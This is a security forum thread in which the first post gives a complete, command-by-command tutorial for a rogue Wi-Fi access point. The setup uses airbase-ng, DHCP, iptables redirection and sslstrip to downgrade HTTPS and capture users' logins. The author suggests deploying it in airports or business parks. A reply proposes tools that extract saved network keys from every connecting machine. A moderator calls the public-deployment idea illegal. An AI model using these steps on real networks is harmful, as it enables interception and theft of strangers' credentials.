Results 1 to 7 of 7

Thread: Setting up airbase with sslstrip

  1. #1
    Member imported_vvpalin's Avatar
    Join Date
    Apr 2009
    Posts
    442

    Default Setting up airbase with sslstrip

    Ive read so much on airbase and ssl strip its not even funny, yet not once have i seen anyone combine the 2. That seemed rather odd to me as it was the first thing i thought about when i found out about sslstrip. "im a total n00b"

    I did this a few weeks ago and it does work, but i must say that even without sslstrip running, the alfa card is crap for this as you cant select the MTU and connecting to the net is agonizingly slow. After a little digging i found out that its because the packet size is enlarged when passed through the tap, and causes it to be fragmented because its to large.

    Anyways this is how you do it.

    Start airbase
    macchanger --mac 00:11:22:33:44:55 wlan0
    airmon-ng start wlan0
    airbase-ng -e APCONNECT wlan0
    Start and connect to your AP with the second adapter "i set mine to open auth"
    macchanger --mac 00:55:44:33:22:11 wlan1
    iwconfig wlan1 ap 00:22:22:22:22:22 essid myapname channel 5
    dhclient wlan1
    Bring up the tap and set the IP
    ifconfig at0 up
    ifconfig at0 10.0.0.1 netmask 255.255.255.0
    ifconfig at0 mtu 1500
    Put this in your dhcpd.conf file
    ddns-update-style ad-hoc;
    default-lease-time 600;
    max-lease-time 7200;
    subnet 10.0.0.0 netmask 255.255.255.0 {
    option subnet-mask 255.255.255.0;
    option broadcast-address 10.0.0.255;
    option routers 10.0.0.1;
    option domain-name-servers 10.0.0.1;
    range 10.0.0.20 10.0.0.50;
    }
    Start dhcp and set the routing table
    dhcpd3 -cf /root/dhcpd.conf at0
    echo 1 > /proc/sys/net/ipv4/ip_forward
    route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
    iptables -t nat -A POSTROUTING --out-interface wlan1 -j MASQUERADE
    iptables --append FORWARD --in-interface at0 -j ACCEPT
    iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to 192.168.2.1

    Now just start up sslstrip on the tap
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 8080
    echo "1" > /proc/sys/net/ipv4/ip_forward
    python ./sslstrip.py -p -f -l 8080
    All you need to do is connect your client to your AP and browse gmail or whatever.

    If sslstrip ever gets ported to C or some other decent language, i think it would be really fun to set it up on the FON router. You could couple 2 of them together so that one connects to the AP, the other becomes an AP ... and all the while sslstrip is running "along with dsniff" capping everything.

    Its honestly scary how effective that attack would be givin the rite area and a skilled attacker. All an attacker would need to do is get the cert explained in moxies video, add an antenna to one or both of the FON's and put it in a airport or business park with a crafty name.

    Not to shabby for this noob

    Edit: I just found out btw that you can run python on the FON with the addition of a media card hack
    Using backtrack for the first time is like being 10 years old again with the keys to a Ferrari.

  2. #2
    Moderator KMDave's Avatar
    Join Date
    Jan 2010
    Posts
    2,281

    Default

    Quote Originally Posted by vvpalin View Post

    If sslstrip ever gets ported to C or some other decent language, i think it would be really fun to set it up on the FON router. You could couple 2 of them together so that one connects to the AP, the other becomes an AP ... and all the while sslstrip is running "along with dsniff" capping everything.

    Its honestly scary how effective that attack would be givin the rite area and a skilled attacker. Just make sure you do the cert explained in moxies video, add an antenna to one or both of the FON's and put it in a airport or business park with a crafty name.

    Not to shabby for this noob
    Even though I appreciate you creating a tutorial the last part is not acceptable. You are suggesting to perform an illegal activity here. Please check the forum rules

    That last part is quite shabby and very noobish.
    Tiocfaidh ár lá

  3. #3
    Member imported_onryo's Avatar
    Join Date
    Apr 2009
    Posts
    109

    Default

    Good stuff Vvplalin!
    Have you been able to get airbase-ng to work in "-P" mode ie airbase-ng -P -C 30? A really devastating blow would be see this working with harvester.rb and wkv.exe. This will extract the network key off off all machines that connect. The idea being that you don't have to crack a wpa key. It will just be grabbed from every computer that connects to airbase. Do this with airbase in -P mode...wow! Just make sure it is only your machines that connect. Otherwise this could redefine the concept of "wardiving" to an illegal activity. I have started porting SSLstrip to C. I am not the best coder on earth so it can take a while.

    onryo
    Let me explain officer, I am not a hacker. I am a security tester of sorts!

  4. #4
    Member imported_vvpalin's Avatar
    Join Date
    Apr 2009
    Posts
    442

    Default

    Quote Originally Posted by KMDave View Post
    Even though I appreciate you creating a tutorial the last part is not acceptable. You are suggesting to perform an illegal activity here. Please check the forum rules

    That last part is quite shabby and very noobish.
    I am not for one second suggesting anyone do this at all. I have never once done anything illegal and actually look down on those that do.

    For the last month or so i have taken on the mindset of an attacker, it has been great fun. While doing this i came up with that idea and i thought i would share as i really have no one else to tell and if not here it would stay locked in my head forever.

    If you would like me to delete it i will but it is a serous threat and i think people should be aware of it.
    Using backtrack for the first time is like being 10 years old again with the keys to a Ferrari.

  5. #5
    Moderator KMDave's Avatar
    Join Date
    Jan 2010
    Posts
    2,281

    Default

    Sorry maybe I just got it wrong when I read it early that morning.

    Nobody is perfect, I am making mistakes too and I apologize for it.

    Wasn't meant as an insult at all, but a well meant hint anyway.

    Thanks for pointing it out again.
    Tiocfaidh ár lá

  6. #6
    Super Moderator Archangel-Amael's Avatar
    Join Date
    Jan 2010
    Location
    Somewhere
    Posts
    8,012

    Default

    Quote Originally Posted by vvpalin View Post
    I am not for one second suggesting anyone do this at all. I have never once done anything illegal and actually look down on those that do.
    For the last month or so i have taken on the mindset of an attacker, it has been great fun. While doing this i came up with that idea and i thought i would share as i really have no one else to tell and if not here it would stay locked in my head forever.
    If you would like me to delete it i will but it is a serous threat and i think people should be aware of it.
    It should be obvious to you ( and I know it is ) that if someone here thinks you are doing or attempting to do something illegal and or unethical, you will get called on it.
    "nuff said. On the other hand full disclosure as was just mentioned in another thread, is important. If it helps make a product or application more secure then I (and others) are all for it, but there is a caveat with that. It must be done appropriately.
    Example: finding a zero day and then posting it here before contact with the manufacturer. That would be a big no no. It's alright that you post your ideas( I don't think anyone is against that). If there is something that you may think is questionable an easy thing to do would be to pm the idea/s to someone with more experience or a mod. This can help you to ensure that you are on the "up & up".
    As for the deletion part it is kind of late to do so, but if a mod sees it and thinks that it is not appropriate then I am sure they will take care of it.
    Cheers
    To be successful here you should read all of the following.
    ForumRules
    ForumFAQ
    If you are new to Back|Track
    Back|Track Wiki
    Failure to do so will probably get your threads deleted or worse.

  7. #7
    Member imported_vvpalin's Avatar
    Join Date
    Apr 2009
    Posts
    442

    Default

    Its reworded a little bit as i think the last few lines were the major problem.

    Im all for full disclosure, however thats not even in my ballpark yet being how new i am. My ideas are mostly just based on the little things i know and for whatever reason people not connecting the dots.

    Thats why im so eager to learn because i honestly think givin enough "training" i can become a serious asset to the security community.

    lol anyone want to offer me a job .. ill even work for minimum wage
    Using backtrack for the first time is like being 10 years old again with the keys to a Ferrari.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •